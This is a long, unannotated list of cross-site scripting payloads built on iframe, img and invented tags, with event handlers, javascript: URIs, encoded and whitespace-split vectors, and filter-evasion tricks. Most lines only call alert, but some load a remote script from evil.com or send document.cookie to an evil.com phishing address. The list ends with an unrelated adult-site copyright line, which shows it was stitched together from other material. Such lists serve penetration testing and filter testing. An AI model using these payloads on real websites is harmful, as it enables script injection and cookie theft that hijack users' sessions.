|
|
new
"><iframe%20src="http://google.com"%%203E
<iframe src=http://www.google.com/>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29> ?
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
<iframe src="javascript:alert(`xss`)">
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B>
“>
“><iframe srcdoc=”<img src=x:x onerror=alert(1)>”>
<iframe srcdoc=<svg/onload=alert(1)>>
<iframe autofocus onfocus=alert(1)>
<iframe autofocus onfocusin=alert(1)>
<iframe draggable="true" ondrag="alert(1)">test
test
test
test
test
<iframe id=x onfocusin=alert(1)>
<iframe id=x tabindex=1 onactivate=alert(1)>
<script>1</script>
<iframe onbeforecopy="alert(1)" contenteditable>test
test
test
<script>1</script>
<iframe onblur=alert(1) id=x><input autofocus>
<iframe onclick="alert(1)">test
test
test
<iframe oncut=alert(1) value="XSS" autofocus tabindex=1>test
<iframe ondblclick="alert(1)" autofocus tabindex=1>test
<input autofocus>
<iframe onkeydown="alert(1)" contenteditable>test
test
test
test
test
test
test
test
test
test
requires scrolling
<iframe onpaste="alert(1)" contenteditable>test
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
<iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
<iframe src="javascript:alert(1)">
<iframe srcdoc="<img src=1 onerror=alert(1)>">
<iframe src=http://ha.ckers.org/scriptlet.html <
<IFRAME SRC="javascript:alert('XSS');">
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<iframe/src="data:text/html,<svg onload=alert(1)>">
<iframe src=javascript:alert(document.location)>
<iframe srcdoc='<body onload=prompt(1)>'>
<iframe/%00/ src=javaSCRIPT:alert(1)
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29>
<iframe2 draggable="true" ondrag="alert(1)">test</iframe2>
<iframe2 draggable="true" ondragend="alert(1)">test</iframe2>
<iframe2 draggable="true" ondragenter="alert(1)">test</iframe2>
<iframe2 draggable="true" ondragleave="alert(1)">test</iframe2>
<iframe2 draggable="true" ondragstart="alert(1)">test</iframe2>
<iframe2 id=x tabindex=1 onactivate=alert(1)></iframe2>
<iframe2 id=x tabindex=1 onbeforeactivate=alert(1)></iframe2>
<iframe2 id=x tabindex=1 onbeforedeactivate=alert(1)></iframe2><input autofocus>
<iframe2 id=x tabindex=1 ondeactivate=alert(1)></iframe2><input id=y autofocus>
<iframe2 onafterscriptexecute=alert(1)><script>1</script>
<iframe2 onbeforescriptexecute=alert(1)><script>1</script>
<iframe2 onclick="alert(1)">test</iframe2>
<iframe2 oncontextmenu="alert(1)">test</iframe2>
<iframe2 oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<iframe2 oncut=alert(1) value="XSS" autofocus tabindex=1>test
<iframe2 ondblclick="alert(1)" autofocus tabindex=1>test</iframe2>
<iframe2 onkeydown="alert(1)" contenteditable>test</iframe2>
<iframe2 onkeypress="alert(1)" contenteditable>test</iframe2>
<iframe2 onkeyup="alert(1)" contenteditable>test</iframe2>
<iframe2 onmousedown="alert(1)">test</iframe2>
<iframe2 onmouseenter="alert(1)">test</iframe2>
<iframe2 onmouseleave="alert(1)">test</iframe2>
<iframe2 onmousemove="alert(1)">test</iframe2>
<iframe2 onmouseout="alert(1)">test</iframe2>
<iframe2 onmouseover="alert(1)">test</iframe2>
<iframe2 onmouseup="alert(1)">test</iframe2>
<iframe2 onmousewheel=alert(1)>requires scrolling
<iframe2 onpointerdown=alert(1)>XSS</iframe2>
<iframe2 onpointerenter=alert(1)>XSS</iframe2>
<iframe2 onpointerleave=alert(1)>XSS</iframe2>
<iframe2 onpointermove=alert(1)>XSS</iframe2>
<iframe2 onpointerout=alert(1)>XSS</iframe2>
<iframe2 onpointerover=alert(1)>XSS</iframe2>
<iframe2 onpointerrawupdate=alert(1)>XSS</iframe2>
<iframe2 onpointerup=alert(1)>XSS</iframe2>
<image draggable="true" ondrag="alert(1)">test</image>
<image draggable="true" ondragend="alert(1)">test</image>
<image draggable="true" ondragenter="alert(1)">test</image>
<image draggable="true" ondragleave="alert(1)">test</image>
<image draggable="true" ondragstart="alert(1)">test</image>
<image id=x tabindex=1 onactivate=alert(1)></image>
<image id=x tabindex=1 onbeforeactivate=alert(1)></image>
<image id=x tabindex=1 onbeforedeactivate=alert(1)></image><input autofocus>
<image id=x tabindex=1 ondeactivate=alert(1)></image><input id=y autofocus>
<image id=x tabindex=1 onfocus=alert(1)></image>
<image id=x tabindex=1 onfocusin=alert(1)></image>
<image onafterscriptexecute=alert(1)><script>1</script>
<image onbeforecopy="alert(1)" contenteditable>test</image>
<image onbeforecut="alert(1)" contenteditable>test</image>
<image onbeforepaste="alert(1)" contenteditable>test</image>
<image onbeforescriptexecute=alert(1)><script>1</script>
<image onblur=alert(1) tabindex=1 id=x></image><input autofocus>
<image onclick="alert(1)">test</image>
<image src="javascript:alert(1)">
<image oncontextmenu="alert(1)">test</image>
<image src=1 href=1 onerror="javascript:alert(1)"></image>
<image oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<image oncut=alert(1) value="XSS" autofocus tabindex=1>test
<image ondblclick="alert(1)" autofocus tabindex=1>test</image>
<image onfocusout=alert(1) tabindex=1 id=x></image><input autofocus>
<image onkeydown="alert(1)" contenteditable>test</image>
<image onkeypress="alert(1)" contenteditable>test</image>
<image onkeyup="alert(1)" contenteditable>test</image>
<image onmousedown="alert(1)">test</image>
<image onmouseenter="alert(1)">test</image>
<image onmouseleave="alert(1)">test</image>
<image onmousemove="alert(1)">test</image>
<image onmouseout="alert(1)">test</image>
<image onmouseover="alert(1)">test</image>
<image onmouseup="alert(1)">test</image>
<image onmousewheel=alert(1)>requires scrolling
<image onpaste="alert(1)" contenteditable>test</image>
<image onpointerdown=alert(1)>XSS</image>
<image onpointerenter=alert(1)>XSS</image>
<image onpointerleave=alert(1)>XSS</image>
<image onpointermove=alert(1)>XSS</image>
<image onpointerout=alert(1)>XSS</image>
<image onpointerover=alert(1)>XSS</image>
<image onpointerrawupdate=alert(1)>XSS</image>
<image onpointerup=alert(1)>XSS</image>
<image src/onerror=alert(1)>
<image src=validimage.png onload=alert(1)>
<image src=validimage.png onloadend=alert(1)>
<image src=validimage.png onloadstart=alert(1)>
<image srcset=1 onerror=alert(1)>
<image src="//evil?
<image2 draggable="true" ondrag="alert(1)">test</image2>
<image2 draggable="true" ondragend="alert(1)">test</image2>
<image2 draggable="true" ondragenter="alert(1)">test</image2>
<image2 draggable="true" ondragleave="alert(1)">test</image2>
<image2 draggable="true" ondragstart="alert(1)">test</image2>
<image2 id=x tabindex=1 onactivate=alert(1)></image2>
<image2 id=x tabindex=1 onbeforeactivate=alert(1)></image2>
<image2 id=x tabindex=1 onbeforedeactivate=alert(1)></image2><input autofocus>
<image2 id=x tabindex=1 ondeactivate=alert(1)></image2><input id=y autofocus>
<image2 onafterscriptexecute=alert(1)><script>1</script>
<image2 onbeforescriptexecute=alert(1)><script>1</script>
<image2 onclick="alert(1)">test</image2>
<image2 oncontextmenu="alert(1)">test</image2>
<image2 oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<image2 oncut=alert(1) value="XSS" autofocus tabindex=1>test
<image2 ondblclick="alert(1)" autofocus tabindex=1>test</image2>
<image2 onkeydown="alert(1)" contenteditable>test</image2>
<image2 onkeypress="alert(1)" contenteditable>test</image2>
<image2 onkeyup="alert(1)" contenteditable>test</image2>
<image2 onmousedown="alert(1)">test</image2>
<image2 onmouseenter="alert(1)">test</image2>
<image2 onmouseleave="alert(1)">test</image2>
<image2 onmousemove="alert(1)">test</image2>
<image2 onmouseout="alert(1)">test</image2>
<image2 onmouseover="alert(1)">test</image2>
<image2 onmouseup="alert(1)">test</image2>
<image2 onmousewheel=alert(1)>requires scrolling
<image2 onpointerdown=alert(1)>XSS</image2>
<image2 onpointerenter=alert(1)>XSS</image2>
<image2 onpointerleave=alert(1)>XSS</image2>
<image2 onpointermove=alert(1)>XSS</image2>
<image2 onpointerout=alert(1)>XSS</image2>
<image2 onpointerover=alert(1)>XSS</image2>
<image2 onpointerrawupdate=alert(1)>XSS</image2>
<image2 onpointerup=alert(1)>XSS</image2>
<image3 draggable="true" ondrag="alert(1)">test</image3>
<image3 draggable="true" ondragend="alert(1)">test</image3>
<image3 draggable="true" ondragenter="alert(1)">test</image3>
<image3 draggable="true" ondragleave="alert(1)">test</image3>
<image3 draggable="true" ondragstart="alert(1)">test</image3>
<image3 id=x tabindex=1 onactivate=alert(1)></image3>
<image3 id=x tabindex=1 onbeforeactivate=alert(1)></image3>
<image3 id=x tabindex=1 onbeforedeactivate=alert(1)></image3><input autofocus>
<image3 id=x tabindex=1 ondeactivate=alert(1)></image3><input id=y autofocus>
<image3 onafterscriptexecute=alert(1)><script>1</script>
<image3 onbeforescriptexecute=alert(1)><script>1</script>
<image3 onclick="alert(1)">test</image3>
<image3 oncontextmenu="alert(1)">test</image3>
<image3 oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<image3 oncut=alert(1) value="XSS" autofocus tabindex=1>test
<image3 ondblclick="alert(1)" autofocus tabindex=1>test</image3>
<image3 onkeydown="alert(1)" contenteditable>test</image3>
<image3 onkeypress="alert(1)" contenteditable>test</image3>
<image3 onkeyup="alert(1)" contenteditable>test</image3>
<image3 onmousedown="alert(1)">test</image3>
<image3 onmouseenter="alert(1)">test</image3>
<image3 onmouseleave="alert(1)">test</image3>
<image3 onmousemove="alert(1)">test</image3>
<image3 onmouseout="alert(1)">test</image3>
<image3 onmouseover="alert(1)">test</image3>
<image3 onmouseup="alert(1)">test</image3>
<image3 onmousewheel=alert(1)>requires scrolling
<image3 onpointerdown=alert(1)>XSS</image3>
<image3 onpointerenter=alert(1)>XSS</image3>
<image3 onpointerleave=alert(1)>XSS</image3>
<image3 onpointermove=alert(1)>XSS</image3>
<image3 onpointerout=alert(1)>XSS</image3>
<image3 onpointerover=alert(1)>XSS</image3>
<image3 onpointerrawupdate=alert(1)>XSS</image3>
<image3 onpointerup=alert(1)>XSS</image3>
<img src="javascript:alert(1)">
'"><img onerror=alert(0) src=><"'
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src='1' onerror/=alert(0) />
<img src="1" onerror="alert(1)" />
"><img src=x onerror=alert('XSS');>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img onerror="location='javascript:=alert(1)'" src="x">
<img onerror="location='javascript:%61lert(1)'" src="x">
<img onerror=alert(1) src <u></u>
<img src=http://127.0.0.1/myspace.asp>
<img src='x' onerror=alert(1)>
“><img src=x onerror=prompt(“ABC”)>
<img src=”x” onerror=”prompt(1;)”/>
<img src=”x” onerror=”prompt("domain")” />
<img onerror="location='javascript:\x2561lert(1)'" src="x">
<img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >
<img src=jav ascr	ipt:al ert(0)>
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
<img src="/" =_=" title="onerror='prompt(1)'">
<img src ?itworksonchrome?\/onerror = alert(1)???
<--`<img/src=` onerror=alert(1)> --!>
"><img src=x onerror=window.open('https://www.google.com/');>
"><img src=x onerror=prompt(1);>
<img src=jav ascr	ipt:i="x=document.createElement('script');x.src='http://www.evil.com/xn.js';x.defer=true;document.getElementsByTagName('head')[0].appendChild(x)";execScript(i)>
<img src=jav ascr	ipt:i="x=docu ment.createElement('\u0053\u0043\u0052\u0049\u0050\u0054');x.src='http://www.evil.com/xn.js';x.defer=true;doc ument.getElementsByTagName('head')[0].appendChild(x)";execScri pt(i)>
new Image().src="http://www.evil.com/phishing/cookie.asp?cookie="+escape(document.cookie);
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<!--<img src="--><img src=x onerror=alert(1)//">
<comment><img src="</comment><img src=x onerror=alert(1))//">
<![><img src="]><img src=x onerror=alert(1)//">
“><img src=x onerror=co\u006efir\u006d`1`>
“><img/src=x%0Aonerror=prompt`1`>
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<img draggable="true" ondrag="alert(1)">test</img>
<img draggable="true" ondragend="alert(1)">test</img>
<img draggable="true" ondragenter="alert(1)">test</img>
<img draggable="true" ondragleave="alert(1)">test</img>
<img draggable="true" ondragstart="alert(1)">test</img>
<img id=x tabindex=1 onactivate=alert(1)></img>
<img id=x tabindex=1 onbeforeactivate=alert(1)></img>
<img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus>
<img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus>
<img id=x tabindex=1 onfocus=alert(1)></img>
<img id=x tabindex=1 onfocusin=alert(1)></img>
<img onafterscriptexecute=alert(1)><script>1</script>
<img onbeforecopy="alert(1)" contenteditable>test</img>
<img onbeforecut="alert(1)" contenteditable>test</img>
<img onbeforepaste="alert(1)" contenteditable>test</img>
<img onbeforescriptexecute=alert(1)><script>1</script>
<img onblur=alert(1) tabindex=1 id=x></img><input autofocus>
<img onclick="alert(1)">test</img>
<img oncontextmenu="alert(1)">test</img>
<img oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<img oncut=alert(1) value="XSS" autofocus tabindex=1>test
<img ondblclick="alert(1)" autofocus tabindex=1>test</img>
<img onfocusout=alert(1) tabindex=1 id=x></img><input autofocus>
<img onkeydown="alert(1)" contenteditable>test</img>
<img onkeypress="alert(1)" contenteditable>test</img>
<img onkeyup="alert(1)" contenteditable>test</img>
<img onmousedown="alert(1)">test</img>
<img onmouseenter="alert(1)">test</img>
<img onmouseleave="alert(1)">test</img>
<img onmousemove="alert(1)">test</img>
<img onmouseout="alert(1)">test</img>
<img onmouseover="alert(1)">test</img>
<img onmouseup="alert(1)">test</img>
<img onmousewheel=alert(1)>requires scrolling
<img onpaste="alert(1)" contenteditable>test</img>
<img onpointerdown=alert(1)>XSS</img>
<img onpointerenter=alert(1)>XSS</img>
<img onpointerleave=alert(1)>XSS</img>
<img onpointermove=alert(1)>XSS</img>
<img onpointerout=alert(1)>XSS</img>
<img onpointerover=alert(1)>XSS</img>
<img onpointerrawupdate=alert(1)>XSS</img>
<img onpointerup=alert(1)>XSS</img>
<img src/onerror=alert(1)>
<img src=validimage.png onload=alert(1)>
<img src=validimage.png onloadend=alert(1)>
<img src=validimage.png onloadstart=alert(1)>
<img referrerpolicy="no-referrer" src="//abc.com">
<img srcset=1 onerror=alert(1)>
"><img src=1 onerror=alert(1)>.gif
<img srcset=validimage.png onload=alert(1)>
<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x>
<img usemap=#x><map name="x"><area href onfocusin=alert(1) id=x>
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />
<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
<img2 draggable="true" ondrag="alert(1)">test</img2>
<img2 draggable="true" ondragend="alert(1)">test</img2>
<img2 draggable="true" ondragenter="alert(1)">test</img2>
<img2 draggable="true" ondragleave="alert(1)">test</img2>
<img2 draggable="true" ondragstart="alert(1)">test</img2>
<img2 id=x tabindex=1 onactivate=alert(1)></img2>
<img2 id=x tabindex=1 onbeforeactivate=alert(1)></img2>
<img2 id=x tabindex=1 onbeforedeactivate=alert(1)></img2><input autofocus>
<img2 id=x tabindex=1 ondeactivate=alert(1)></img2><input id=y autofocus>
<img2 onafterscriptexecute=alert(1)><script>1</script>
<img2 onbeforescriptexecute=alert(1)><script>1</script>
<img2 onclick="alert(1)">test</img2>
<img2 oncontextmenu="alert(1)">test</img2>
<img2 oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<img2 oncut=alert(1) value="XSS" autofocus tabindex=1>test
<img2 ondblclick="alert(1)" autofocus tabindex=1>test</img2>
<img2 onkeydown="alert(1)" contenteditable>test</img2>
<img2 onkeypress="alert(1)" contenteditable>test</img2>
<img2 onkeyup="alert(1)" contenteditable>test</img2>
<img2 onmousedown="alert(1)">test</img2>
<img2 onmouseenter="alert(1)">test</img2>
<img2 onmouseleave="alert(1)">test</img2>
<img2 onmousemove="alert(1)">test</img2>
<img2 onmouseout="alert(1)">test</img2>
<img2 onmouseover="alert(1)">test</img2>
<img2 onmouseup="alert(1)">test</img2>
<img2 onmousewheel=alert(1)>requires scrolling
<img2 onpointerdown=alert(1)>XSS</img2>
<img2 onpointerenter=alert(1)>XSS</img2>
<img2 onpointerleave=alert(1)>XSS</img2>
<img2 onpointermove=alert(1)>XSS</img2>
<img2 onpointerout=alert(1)>XSS</img2>
<img2 onpointerover=alert(1)>XSS</img2>
<img2 onpointerrawupdate=alert(1)>XSS</img2>
<img2 onpointerup=alert(1)>XSS</img2>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
`"'><img src='#\x27 onerror=javascript:alert(1)>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<img src=# onerror\x3D"javascript:alert(1)" >
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<IMG SRC="jav ascript:javascript:alert(1);">
<IMG SRC="javascript:javascript:alert(1)"
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<IMG SRC=&{javascript:alert(1);};>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
© Copyright Chaturbate 2011- 2026. All Rights Reserved.